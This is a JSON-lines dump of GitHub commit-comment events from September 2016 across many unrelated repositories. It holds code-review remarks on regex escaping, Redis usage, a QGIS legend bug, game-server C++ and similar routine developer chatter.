{"id":"4512609466","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18890896,"position":35,"line":49,"path":"ficbot.js","commit_id":"2ae7e088144e3e19c89afbe059130ec7a4fde851","created_at":"2016-09-03T19:09:51Z","updated_at":"2016-09-03T19:09:51Z","body":"No need to escape the forward slash here or on lines 54 and 56 (other closing tags) because the regex is being created via a string, not the /pattern/ syntax"}},"created_at":"2016-09-03T19:09:51Z"}
{"id":"4512609585","type":"CommitCommentEvent","actor":{"login":"Arinerron"},"repo":{"name":"karatebuilderboy/Launcher"},"payload":{"comment":{"id":18890897,"position":null,"line":null,"path":null,"commit_id":"8ecec369499d2a6336e35c438b23a03e181f734b","created_at":"2016-09-03T19:09:56Z","updated_at":"2016-09-03T19:09:56Z","body":"@karatebuilderboy Here's the MessageCountServer. http://pastebin.com/raw/m5PbF7md"}},"created_at":"2016-09-03T19:09:56Z"}
{"id":"4512609637","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18890898,"position":44,"line":58,"path":"ficbot.js","commit_id":"2ae7e088144e3e19c89afbe059130ec7a4fde851","created_at":"2016-09-03T19:09:59Z","updated_at":"2016-09-03T19:09:59Z","body":"Make sure all commands have arguments, even if an empty set! `\\command{}` [[1]](http://tex.stackexchange.com/questions/31091/space-after-latex-commands)"}},"created_at":"2016-09-03T19:09:59Z"}
{"id":"4512609832","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18890899,"position":70,"line":67,"path":"ficbot.js","commit_id":"2ae7e088144e3e19c89afbe059130ec7a4fde851","created_at":"2016-09-03T19:10:10Z","updated_at":"2016-09-03T19:10:10Z","body":"New single-quote regex (again)! It was supposed to be this simple:\r\n`\\W'(.+)'\\W`\r\n`\\W` matches any non-word character (`[^A-Za-z0-9_]`). If there were a letter before or after the first or last quote, it would actually be a contraction.\r\n`(.+)` captures at least one character between the single quotes. Zero characters would be '', probably not something that should be there or that we want to match.\r\n\r\nSo then we replace it using ``` `$1' ```. Unfortunately, that would also replace the non-word characters (which may quite likely be whitespace) because they are included in the match. How do we check for the presence of an expression without including it in the match? Regex lookaround! As you seen in the final regex here, `(?=\\W)` defines a positive lookahead (positive because we are looking for it, not checking for its absence). \r\nNow we just have to do the same with the first `\\W`, but looking before the match. Using a positive lookbehind, this would be `(?<=\\W)`. Unfortunately, JavaScript does not support lookbehind. Instead we have to capture it and put it back in with the replace."}},"created_at":"2016-09-03T19:10:10Z"}
{"id":"4512610109","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18890900,"position":72,"line":69,"path":"ficbot.js","commit_id":"2ae7e088144e3e19c89afbe059130ec7a4fde851","created_at":"2016-09-03T19:10:19Z","updated_at":"2016-09-03T19:10:19Z","body":"Should be a single backslash as this is an escape sequence for the intended character"}},"created_at":"2016-09-03T19:10:19Z"}
{"id":"4512610494","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18890903,"position":83,"line":80,"path":"ficbot.js","commit_id":"2ae7e088144e3e19c89afbe059130ec7a4fde851","created_at":"2016-09-03T19:10:34Z","updated_at":"2016-09-03T19:10:34Z","body":"Notice the replacements, specifically those for braces and backslashes, are performed before the `\\end{document}` command and front matter are joined with the text block.\r\nEdit: unfortunately, the `\\chapter{}` commands are already in the chapters variable and will be escaped :("}},"created_at":"2016-09-03T19:10:34Z"}
{"id":"4512610652","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18890904,"position":null,"line":null,"path":null,"commit_id":"2ae7e088144e3e19c89afbe059130ec7a4fde851","created_at":"2016-09-03T19:10:42Z","updated_at":"2016-09-03T19:10:42Z","body":"Any entries in `replacements` with regex syntax will not match property, yielding the text \"undefined\" on the page. The affected lines are: 46 `\\\\\\\\`, 53-56 `<em>|<i>`, 62 `\\\\^`, 64 `&|%|\\\\$|#|_`, 66-67 `\\\"([^\\\"]+)\\\"` `(\\\\W)'(.+)'(?=\\\\W)`"}},"created_at":"2016-09-03T19:10:42Z"}
{"id":"4512610753","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18890905,"position":null,"line":null,"path":null,"commit_id":"2ae7e088144e3e19c89afbe059130ec7a4fde851","created_at":"2016-09-03T19:10:47Z","updated_at":"2016-09-03T19:10:47Z","body":"Switch to Split view and uncheck Show notes for a brief overview"}},"created_at":"2016-09-03T19:10:47Z"}
{"id":"4512612947","type":"CommitCommentEvent","actor":{"login":"CristianLema"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18890907,"position":19,"line":19,"path":"src/com/sopra/tienda/dominio/Categoria.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-03T19:12:35Z","updated_at":"2016-09-03T19:12:35Z","body":"Si.... esto non o fixen de todo eu. Ó primeiro fixémolo nós, cada un a súa versión, e despois o profesor deunos a súa, a cal solía estar....optimizada"}},"created_at":"2016-09-03T19:12:35Z"}
{"id":"4512613781","type":"CommitCommentEvent","actor":{"login":"zamasu"},"repo":{"name":"martin-gorner/tensorflow-mnist-tutorial"},"payload":{"comment":{"id":18890908,"position":null,"line":null,"path":null,"commit_id":"5d0a9b1a8468b3ae18d38e183187df435be56871","created_at":"2016-09-03T19:13:16Z","updated_at":"2016-09-03T19:13:16Z","body":"just by changing 2 values ? "}},"created_at":"2016-09-03T19:13:16Z"}
{"id":"4512614569","type":"CommitCommentEvent","actor":{"login":"CristianLema"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18890910,"position":103,"line":103,"path":"src/com/sopra/tienda/dominio/Producto.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-03T19:13:57Z","updated_at":"2016-09-03T19:13:57Z","body":"A casi totalidad dos métodos de Validator nombrounos o profesor, nós tan solo fixemos o código a partir do javadoc q tamén fixo el"}},"created_at":"2016-09-03T19:13:57Z"}
{"id":"4512615062","type":"CommitCommentEvent","actor":{"login":"Mafii"},"repo":{"name":"IDPA-2016-NEAT-CNN/NEAT_Visualizer"},"payload":{"comment":{"id":18890912,"position":4,"line":23,"path":"NEAT_Visualizer/App.xaml.cs","commit_id":"36896728dc589ad246b0735a24fee433af13de2c","created_at":"2016-09-03T19:14:24Z","updated_at":"2016-09-03T19:14:24Z","body":"🙈🙈🙈🙈🙈 thanks :>"}},"created_at":"2016-09-03T19:14:24Z"}
{"id":"4512616063","type":"CommitCommentEvent","actor":{"login":"aqw"},"repo":{"name":"emilsvennesson/kodi-espnplayer"},"payload":{"comment":{"id":18890913,"position":null,"line":null,"path":null,"commit_id":"74a57e18f48a4987b87626b90372a5148b8faed6","created_at":"2016-09-03T19:15:10Z","updated_at":"2016-09-03T19:15:10Z","body":"@emilsvennesson They're compatible but not interchangeable. ;-) And no worries; I don't mind. I just noticed it and it makes sense to keep it all correct rather than drift sideways. Enjoy your newly GPL-3 compatible project. :-)\r\n\r\n---Alex"}},"created_at":"2016-09-03T19:15:10Z"}
{"id":"4512618623","type":"CommitCommentEvent","actor":{"login":"jimsward"},"repo":{"name":"jimsward/books"},"payload":{"comment":{"id":18890916,"position":null,"line":null,"path":null,"commit_id":"6e20a29814498cfcb81fa04c77794a150e9aa49a","created_at":"2016-09-03T19:17:03Z","updated_at":"2016-09-03T19:17:03Z","body":"Closes #12"}},"created_at":"2016-09-03T19:17:03Z"}
{"id":"4512620416","type":"CommitCommentEvent","actor":{"login":"yoshuawuyts"},"repo":{"name":"watson/nodeboat"},"payload":{"comment":{"id":18890921,"position":null,"line":null,"path":null,"commit_id":"8fc3c967e6ebd80118f19f97303ca712174c5230","created_at":"2016-09-03T19:18:33Z","updated_at":"2016-09-03T19:18:33Z","body":":heart:"}},"created_at":"2016-09-03T19:18:33Z"}
{"id":"4512621012","type":"CommitCommentEvent","actor":{"login":"cajund"},"repo":{"name":"gmu-mis-412/daves_donuts"},"payload":{"comment":{"id":18890922,"position":null,"line":null,"path":null,"commit_id":"f6d8abadaa854071cde277bac27b684c2ace0f76","created_at":"2016-09-03T19:19:03Z","updated_at":"2016-09-03T19:19:03Z","body":"File Comment"}},"created_at":"2016-09-03T19:19:03Z"}
{"id":"4512621586","type":"CommitCommentEvent","actor":{"login":"Arinerron"},"repo":{"name":"karatebuilderboy/Launcher"},"payload":{"comment":{"id":18890923,"position":null,"line":null,"path":null,"commit_id":"8ecec369499d2a6336e35c438b23a03e181f734b","created_at":"2016-09-03T19:19:32Z","updated_at":"2016-09-03T19:19:32Z","body":"To set a cloud variable (on any project you want), here's the code:\r\n\r\n```\r\npublic void setCloud(String username, String password, int projectid, String variable, int value) throws Exception {\r\n    Scratch.createSession(username, password).getCloudSession(projectid).set(Scratch.CLOUD + \" \" + variable, value);\r\n}\r\n```\r\n\r\nto use it,\r\n\r\n```\r\nint projectid = 4576982; // set the project id here. Doesn't have to be yours, but you'll get accused of hacking by people who understand if you change someone elses :P\r\nString variable = \"example\"; // No cloud symbol or space before.\r\nint value = 9999; // Right now it has to be an int, technically, it could be a String, but I haven't implemented that yet. Plus, that would be against the rules.\r\nsetCloud(\"karatebuilderboy\", \"<password>\", projectid, variable, value);\r\n```"}},"created_at":"2016-09-03T19:19:32Z"}
{"id":"4512622398","type":"CommitCommentEvent","actor":{"login":"CristianLema"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18890924,"position":7,"line":7,"path":"src/com/sopra/tienda/util/MainValidator.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-03T19:20:15Z","updated_at":"2016-09-03T19:20:15Z","body":"test.... *_*\"   esta clase foi creada antes de dáremos junit"}},"created_at":"2016-09-03T19:20:15Z"}
{"id":"4512623984","type":"CommitCommentEvent","actor":{"login":"mapsam"},"repo":{"name":"mapnik/node-mapnik"},"payload":{"comment":{"id":18890925,"position":null,"line":null,"path":null,"commit_id":"a78541490afe2f396e766c2f4aeac306d2f8537b","created_at":"2016-09-03T19:21:32Z","updated_at":"2016-09-03T19:21:32Z","body":"🙌 "}},"created_at":"2016-09-03T19:21:32Z"}
{"id":"4512625240","type":"CommitCommentEvent","actor":{"login":"ClementNerma"},"repo":{"name":"ClementNerma/NightOS"},"payload":{"comment":{"id":18890926,"position":null,"line":null,"path":null,"commit_id":"5444338a7450eaa5275f56a1fac80b3d2d181ea3","created_at":"2016-09-03T19:22:31Z","updated_at":"2016-09-03T19:22:31Z","body":"This is the very first version of NightOS.\r\nIt contains the code base of the system, I didn't made any commit before it because it was too complicated to make some commits before having a minimal working system."}},"created_at":"2016-09-03T19:22:31Z"}
{"id":"4512629016","type":"CommitCommentEvent","actor":{"login":"rugk"},"repo":{"name":"jelhan/croodle"},"payload":{"comment":{"id":18890931,"position":null,"line":null,"path":null,"commit_id":"3cf26d722149f7605cab241065c0a40348444970","created_at":"2016-09-03T19:25:54Z","updated_at":"2016-09-03T19:25:54Z","body":"Al right, thanks for your information."}},"created_at":"2016-09-03T19:25:54Z"}
{"id":"4512629859","type":"CommitCommentEvent","actor":{"login":"CristianLema"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18890932,"position":11,"line":11,"path":"test/com/sopra/tienda/dominio/CategoriaTest.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-03T19:26:36Z","updated_at":"2016-09-03T19:26:36Z","body":"Tests automáticos abandonados"}},"created_at":"2016-09-03T19:26:36Z"}
{"id":"4512630956","type":"CommitCommentEvent","actor":{"login":"CristianLema"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18890934,"position":17,"line":17,"path":"test/com/sopra/tienda/objetos/daos/testCategoriaDao.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-03T19:27:33Z","updated_at":"2016-09-03T19:27:33Z","body":"Non a bauticei eu"}},"created_at":"2016-09-03T19:27:33Z"}
{"id":"4512631017","type":"CommitCommentEvent","actor":{"login":"acasar"},"repo":{"name":"rainlab/location-plugin"},"payload":{"comment":{"id":18890935,"position":null,"line":null,"path":null,"commit_id":"b3ba2d5f90efb1247c5be68fdcf9fe3e79a28751","created_at":"2016-09-03T19:27:37Z","updated_at":"2016-09-03T19:27:37Z","body":"@daftspunk When installing this plugin on a fresh October instance I get this error:\r\n\r\n``SQLSTATE[42S22]: Column not found: 1054 Unknown column 'is_pinned' in 'field list'``\r\n\r\nI suppose ``is_pinned`` column can't be included in the seed file since it executes before ``is_pinned`` column is even added."}},"created_at":"2016-09-03T19:27:37Z"}
{"id":"4512631460","type":"CommitCommentEvent","actor":{"login":"Skull3x"},"repo":{"name":"Muqsit/XPBottle"},"payload":{"comment":{"id":18890936,"position":null,"line":null,"path":null,"commit_id":"1bffe7f6d084a97c1f3c97b5f31e2911787ef5c8","created_at":"2016-09-03T19:27:59Z","updated_at":"2016-09-03T19:27:59Z","body":"Lol"}},"created_at":"2016-09-03T19:27:59Z"}
{"id":"4512631463","type":"CommitCommentEvent","actor":{"login":"jpphaneuf"},"repo":{"name":"jpphaneuf/overwatch"},"payload":{"comment":{"id":18890937,"position":null,"line":null,"path":null,"commit_id":"5a1238761936af71f2f66f7b1a17c609adb99fdd","created_at":"2016-09-03T19:27:59Z","updated_at":"2016-09-03T19:27:59Z","body":"Fixes #1 "}},"created_at":"2016-09-03T19:27:59Z"}
{"id":"4512639162","type":"CommitCommentEvent","actor":{"login":"fearOfSociety"},"repo":{"name":"fearOfSociety/glowing-octo-shame-arma2"},"payload":{"comment":{"id":18890949,"position":null,"line":null,"path":null,"commit_id":"722f37f13a9e8c261b47f54c397557925dcfe1d5","created_at":"2016-09-03T19:34:20Z","updated_at":"2016-09-03T19:34:20Z","body":"Зря я это сделал, ошибка"}},"created_at":"2016-09-03T19:34:20Z"}
{"id":"4512639180","type":"CommitCommentEvent","actor":{"login":"fsamin"},"repo":{"name":"ovh/tat"},"payload":{"comment":{"id":18890950,"position":11,"line":11,"path":"api/cache/topic.go","commit_id":"ddd2f176d5af7c0ca37cd1c5491e3493c66054a4","created_at":"2016-09-03T19:34:21Z","updated_at":"2016-09-03T19:34:21Z","body":"Redis KEYS command is not suitable with cluster usage, since KEYS only returns KEYS for current SLOT. That's why I removed it from the interface."}},"created_at":"2016-09-03T19:34:21Z"}
{"id":"4512639418","type":"CommitCommentEvent","actor":{"login":"DLvalentine"},"repo":{"name":"DLvalentine/GSX"},"payload":{"comment":{"id":18890952,"position":4,"line":4,"path":"GSX.pl","commit_id":"3a0f848b210d622feb13dee77ef4dff325fdf8d6","created_at":"2016-09-03T19:34:34Z","updated_at":"2016-09-03T19:34:34Z","body":"This was causing `Command Not Found` to appear in command prompt / terminal"}},"created_at":"2016-09-03T19:34:34Z"}
{"id":"4512639959","type":"CommitCommentEvent","actor":{"login":"aida92"},"repo":{"name":"aida92/Q-Maze"},"payload":{"comment":{"id":18890953,"position":null,"line":null,"path":null,"commit_id":"4c32c311617ac2fda01abfda7e1bda33d24940fd","created_at":"2016-09-03T19:35:01Z","updated_at":"2016-09-03T19:35:01Z","body":"TO DO: sorting by date is not working correctly and is disabled for now."}},"created_at":"2016-09-03T19:35:01Z"}
{"id":"4512640181","type":"CommitCommentEvent","actor":{"login":"yesnault"},"repo":{"name":"ovh/tat"},"payload":{"comment":{"id":18890954,"position":11,"line":11,"path":"api/cache/topic.go","commit_id":"ddd2f176d5af7c0ca37cd1c5491e3493c66054a4","created_at":"2016-09-03T19:35:13Z","updated_at":"2016-09-03T19:35:13Z","body":"yes, fixed in commit after"}},"created_at":"2016-09-03T19:35:13Z"}
{"id":"4512641169","type":"CommitCommentEvent","actor":{"login":"zg"},"repo":{"name":"fruux/Baikal"},"payload":{"comment":{"id":18890958,"position":null,"line":null,"path":null,"commit_id":"6e311126dd31d918cf93c3095c74bdf786fb55b6","created_at":"2016-09-03T19:36:01Z","updated_at":"2016-09-03T19:36:01Z","body":"Why were null fields causing sync issues?"}},"created_at":"2016-09-03T19:36:01Z"}
{"id":"4512641499","type":"CommitCommentEvent","actor":{"login":"StefH"},"repo":{"name":"primefaces/primeng"},"payload":{"comment":{"id":18890961,"position":null,"line":null,"path":null,"commit_id":"c0b9d3807f87528fab304c4e73679c4e60dc4689","created_at":"2016-09-03T19:36:18Z","updated_at":"2016-09-03T19:36:18Z","body":"Why remove all dependencies ?\r\n\r\nThis makes it impossible to build the project ???"}},"created_at":"2016-09-03T19:36:18Z"}
{"id":"4512645430","type":"CommitCommentEvent","actor":{"login":"gappi92"},"repo":{"name":"gappi92/ghfghfgh"},"payload":{"comment":{"id":18890969,"position":null,"line":null,"path":null,"commit_id":"42b4784033240c5a26de0356f1d1ed8f11836487","created_at":"2016-09-03T19:39:41Z","updated_at":"2016-09-03T19:39:41Z","body":"важная хрень"}},"created_at":"2016-09-03T19:39:41Z"}
{"id":"4512645525","type":"CommitCommentEvent","actor":{"login":"gappi92"},"repo":{"name":"gappi92/ghfghfgh"},"payload":{"comment":{"id":18890970,"position":null,"line":null,"path":null,"commit_id":"42b4784033240c5a26de0356f1d1ed8f11836487","created_at":"2016-09-03T19:39:46Z","updated_at":"2016-09-03T19:39:46Z","body":"ага"}},"created_at":"2016-09-03T19:39:46Z"}
{"id":"4512646518","type":"CommitCommentEvent","actor":{"login":"Alxbss"},"repo":{"name":"Alxbss/box2d"},"payload":{"comment":{"id":18890974,"position":null,"line":null,"path":null,"commit_id":"a7c93049dc9e9f00bfe9a6818323d62481c64a3d","created_at":"2016-09-03T19:40:31Z","updated_at":"2016-09-03T19:40:31Z","body":"update"}},"created_at":"2016-09-03T19:40:31Z"}
{"id":"4512647522","type":"CommitCommentEvent","actor":{"login":"gappi92"},"repo":{"name":"gappi92/ghfghfgh"},"payload":{"comment":{"id":18890978,"position":null,"line":null,"path":null,"commit_id":"42b4784033240c5a26de0356f1d1ed8f11836487","created_at":"2016-09-03T19:41:18Z","updated_at":"2016-09-03T19:41:18Z","body":"[\r\n![1472927994729](https://cloud.githubusercontent.com/assets/11060484/18227270/e5e856c4-722f-11e6-92fc-6b14c0407234.jpg)\r\n](url)"}},"created_at":"2016-09-03T19:41:18Z"}
{"id":"4512647620","type":"CommitCommentEvent","actor":{"login":"gfontenot"},"repo":{"name":"jayroh/dotfiles.new"},"payload":{"comment":{"id":18890979,"position":null,"line":null,"path":null,"commit_id":"f9318c6761d426bcf3631bf884eabe0844958372","created_at":"2016-09-03T19:41:22Z","updated_at":"2016-09-03T19:41:22Z","body":"💖 "}},"created_at":"2016-09-03T19:41:22Z"}
{"id":"4512647929","type":"CommitCommentEvent","actor":{"login":"TheOfficialFloW"},"repo":{"name":"TheOfficialFloW/VitaShell"},"payload":{"comment":{"id":18890980,"position":null,"line":null,"path":null,"commit_id":"8b128f00774ad354b2c802cad40fd70e74f254ea","created_at":"2016-09-03T19:41:38Z","updated_at":"2016-09-03T19:41:38Z","body":"Did you make the icons by yourself? If so, would be cool to have a text-file icon"}},"created_at":"2016-09-03T19:41:38Z"}
{"id":"4512648935","type":"CommitCommentEvent","actor":{"login":"SabahEl-hafi"},"repo":{"name":"SabahEl-hafi/test"},"payload":{"comment":{"id":18890985,"position":null,"line":null,"path":null,"commit_id":"8eafa7fbf4792536f8b3c5fc6c7b9990ef439c9b","created_at":"2016-09-03T19:42:29Z","updated_at":"2016-09-03T19:42:29Z","body":"This File fot Test "}},"created_at":"2016-09-03T19:42:29Z"}
{"id":"4512648939","type":"CommitCommentEvent","actor":{"login":"an-OK-squirrel"},"repo":{"name":"minerguy31/bf-asm"},"payload":{"comment":{"id":18890986,"position":null,"line":null,"path":null,"commit_id":"4cab85c0128e6eb79ac849b719d27532eaeaea40","created_at":"2016-09-03T19:42:29Z","updated_at":"2016-09-03T19:42:29Z","body":"God dang `!!`, making everything look weird"}},"created_at":"2016-09-03T19:42:29Z"}
{"id":"4512649064","type":"CommitCommentEvent","actor":{"login":"fsamin"},"repo":{"name":"ovh/tat"},"payload":{"comment":{"id":18890987,"position":6,"line":73,"path":"api/cache/cache.go","commit_id":"4fe7e12d1447d781a639f7b553eb726e2b08b7c1","created_at":"2016-09-03T19:42:36Z","updated_at":"2016-09-03T19:42:36Z","body":"why make a array ?\r\n```Client().SRem(key, members)``` should be fine, shouldn't it ?\r\n"}},"created_at":"2016-09-03T19:42:36Z"}
{"id":"4512649221","type":"CommitCommentEvent","actor":{"login":"ShevT"},"repo":{"name":"m571-cm/android_vendor_meizu_m2note"},"payload":{"comment":{"id":18890989,"position":null,"line":null,"path":null,"commit_id":"ba9712a74aa97435d6407aaf1e4d145d69987002","created_at":"2016-09-03T19:42:44Z","updated_at":"2016-09-03T19:42:44Z","body":"Это лишнее. auditd должен собираться из исходников CM"}},"created_at":"2016-09-03T19:42:44Z"}
{"id":"4512649588","type":"CommitCommentEvent","actor":{"login":"SabahEl-hafi"},"repo":{"name":"SabahEl-hafi/test"},"payload":{"comment":{"id":18890990,"position":null,"line":null,"path":null,"commit_id":"8eafa7fbf4792536f8b3c5fc6c7b9990ef439c9b","created_at":"2016-09-03T19:43:01Z","updated_at":"2016-09-03T19:43:01Z","body":"This File For Test "}},"created_at":"2016-09-03T19:43:01Z"}
{"id":"4512655925","type":"CommitCommentEvent","actor":{"login":"yossigil"},"repo":{"name":"SpartanRefactoring/spartan-refactoring"},"payload":{"comment":{"id":18890996,"position":null,"line":null,"path":null,"commit_id":"b4f6d4422f258aa7cf944cb18928f83b63a4ce25","created_at":"2016-09-03T19:48:00Z","updated_at":"2016-09-03T19:48:00Z","body":"Ok, I will look in the code and see what I can do."}},"created_at":"2016-09-03T19:48:00Z"}
{"id":"4512657029","type":"CommitCommentEvent","actor":{"login":"harshavardhana"},"repo":{"name":"vadmeste/minio"},"payload":{"comment":{"id":18890997,"position":77,"line":243,"path":"cmd/object-handlers_test.go","commit_id":"2e48ae5cf0c579778ede4a44b6796ce7f9d27ca7","created_at":"2016-09-03T19:48:53Z","updated_at":"2016-09-03T19:48:53Z","body":"New test signed request does only common payload signature. "}},"created_at":"2016-09-03T19:48:53Z"}
{"id":"4512657455","type":"CommitCommentEvent","actor":{"login":"rduivenvoorde"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18890998,"position":null,"line":null,"path":null,"commit_id":"69bed218373b3f93671f65bc3d02c45cbf683a48","created_at":"2016-09-03T19:49:12Z","updated_at":"2016-09-03T19:49:12Z","body":"@pvalsecc Hi Patrick, can you please have a look at this issue at the user mailing list (and my analysis of it):\r\n\r\nhttps://lists.osgeo.org/pipermail/qgis-user/2016-September/037640.html\r\n\r\nIt looks like for a (raster) layer in that service, without an actual legendgraphic, this algorithm tries to pick the parent node style + legend. Which in this case is plain wrong.\r\n\r\nAny idea how to fix this?\r\n\r\nRegards,\r\n\r\nRichard Duivenvoorde (richard@qgis.org)"}},"created_at":"2016-09-03T19:49:12Z"}
{"id":"4512657913","type":"CommitCommentEvent","actor":{"login":"littlebalup"},"repo":{"name":"TheOfficialFloW/VitaShell"},"payload":{"comment":{"id":18890999,"position":null,"line":null,"path":null,"commit_id":"8b128f00774ad354b2c802cad40fd70e74f254ea","created_at":"2016-09-03T19:49:35Z","updated_at":"2016-09-03T19:49:35Z","body":"it's resized GNU gnome default desktop icons.\r\nyes it would be cool to add test-file, SFO file, mp3 file icons... and so on. I'll take a look in a next step."}},"created_at":"2016-09-03T19:49:35Z"}
{"id":"4512659080","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":18891000,"position":null,"line":null,"path":null,"commit_id":"5b011b0d8a9f30cc0f5fca8ed997e1d3e2a1adf3","created_at":"2016-09-03T19:50:29Z","updated_at":"2016-09-03T19:50:29Z","body":"The best commits just delete a lot of old code. Great job!"}},"created_at":"2016-09-03T19:50:29Z"}
{"id":"4512662917","type":"CommitCommentEvent","actor":{"login":"Mr-MEX"},"repo":{"name":"cherifyass/android_device_lge_hammerhead"},"payload":{"comment":{"id":18891003,"position":null,"line":null,"path":null,"commit_id":"1cb3c619286e2edaceb068466fc8c5d4159d7f1c","created_at":"2016-09-03T19:53:39Z","updated_at":"2016-09-03T19:53:39Z","body":"Not necessary...\r\nAndroid Build System (build.prop generator) that makes itself"}},"created_at":"2016-09-03T19:53:39Z"}
{"id":"4512664633","type":"CommitCommentEvent","actor":{"login":"aminroosta"},"repo":{"name":"VSCodeVim/Vim"},"payload":{"comment":{"id":18891004,"position":null,"line":null,"path":null,"commit_id":"660df9aa65fbaa558c6c52541cfb2e618e856c96","created_at":"2016-09-03T19:55:07Z","updated_at":"2016-09-03T19:55:07Z","body":"@xconverge It works fine on my machine. can you please check once more :-)"}},"created_at":"2016-09-03T19:55:07Z"}
{"id":"4512667335","type":"CommitCommentEvent","actor":{"login":"kgliu0101"},"repo":{"name":"ClinGen/clincoded"},"payload":{"comment":{"id":18891005,"position":14,"line":562,"path":"src/clincoded/static/components/variant_central/interpretation/computational.js","commit_id":"4522a18f16836a6fe262c21b0d2acc94d21490e1","created_at":"2016-09-03T19:57:26Z","updated_at":"2016-09-03T19:57:26Z","body":"@jimmyzhen If that is the `'` of 5 prime, is it OK using html entity code `&#39;` to replace the `'`?"}},"created_at":"2016-09-03T19:57:26Z"}
{"id":"4512667410","type":"CommitCommentEvent","actor":{"login":"boxa"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18891006,"position":23,"line":2296,"path":"src/game/Creature.cpp","commit_id":"e9f9b43fe2351289f8f5a34efef8709d5e4fd30f","created_at":"2016-09-03T19:57:29Z","updated_at":"2016-09-03T19:57:29Z","body":"my old variant, more universally:\r\n\r\n        case ATTACKING_TARGET_NEAREST:\r\n        case ATTACKING_TARGET_FARTHEST:\r\n        {\r\n            std::list<Unit*> suitableUnits;\r\n\r\n            for (; itr != threatlist.end(); ++itr)\r\n            {\r\n                if (Unit* pTarget = GetMap()->GetUnit((*itr)->getUnitGuid()))\r\n                {\r\n                    if (!selectFlags || MeetsSelectAttackingRequirement(pTarget, pSpellInfo, selectFlags))\r\n                        suitableUnits.push_back(pTarget);\r\n                }\r\n            }\r\n\r\n            if (!suitableUnits.empty())\r\n            {\r\n                if (position >= suitableUnits.size())\r\n                    break;\r\n\r\n                if (suitableUnits.size() > 1)\r\n                {\r\n                    if (target == ATTACKING_TARGET_NEAREST)\r\n                        suitableUnits.sort(TargetDistanceOrderNear(this));\r\n                    else\r\n                        suitableUnits.sort(TargetDistanceOrderFarAway(this));\r\n                }\r\n\r\n                std::list<Unit*>::iterator itr2 = suitableUnits.begin();\r\n                if (position)\r\n                    std::advance(itr2, position);\r\n                return *itr2;\r\n            }\r\n\r\n            break;\r\n        }\r\n\r\n\r\nmoved from Spell.cpp to Unit.h:\r\n\r\n```\r\nstruct TargetDistanceOrderNear : public std::binary_function<Unit const, Unit const, bool>\r\n{\r\n...\r\n}\r\n\r\nstruct TargetDistanceOrderFarAway : public std::binary_function<Unit const, Unit const, bool>\r\n{\r\n...\r\n}\r\n```"}},"created_at":"2016-09-03T19:57:29Z"}
{"id":"4512668575","type":"CommitCommentEvent","actor":{"login":"frank087234"},"repo":{"name":"oe-alliance/oe-alliance-plugins"},"payload":{"comment":{"id":18891007,"position":null,"line":null,"path":null,"commit_id":"b802ed8a648f33b3071e4869b4f92087de9c70ac","created_at":"2016-09-03T19:58:25Z","updated_at":"2016-09-03T19:58:25Z","body":"Can you do built in openepg as in blackhole images?\n\nOn Tuesday, 30 August 2016, Ev0-BH <notifications@github.com> wrote:\n\n> All ok now\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/oe-alliance/oe-alliance-plugins/commit/b802ed8a648f33b3071e4869b4f92087de9c70ac#commitcomment-18830331>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AD2-6NN_s-4ipZRh9_U1-BMLgqYFUinUks5qlD34gaJpZM4JwhBk>\n> .\n>\n"}},"created_at":"2016-09-03T19:58:25Z"}
{"id":"4512670314","type":"CommitCommentEvent","actor":{"login":"tudorbarascu"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18891008,"position":null,"line":null,"path":null,"commit_id":"afa20ec28d6952e80708c7a37d47e19723c7807d","created_at":"2016-09-03T19:59:48Z","updated_at":"2016-09-03T19:59:48Z","body":"@gioman Just documented it at https://github.com/qgis/QGIS-Documentation/pull/1378"}},"created_at":"2016-09-03T19:59:48Z"}
{"id":"4511436419","type":"CommitCommentEvent","actor":{"login":"TehStoneMan"},"repo":{"name":"TehStoneMan/CashCraft"},"payload":{"comment":{"id":18888484,"position":null,"line":null,"path":null,"commit_id":"4d821780da4876e17dabdcc2ab4abeaa5a3fe49a","created_at":"2016-09-03T02:02:31Z","updated_at":"2016-09-03T02:02:31Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;x99AYbil&#x2F;20-review-currency-values\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Review currency values</a>"}},"created_at":"2016-09-03T02:02:31Z"}
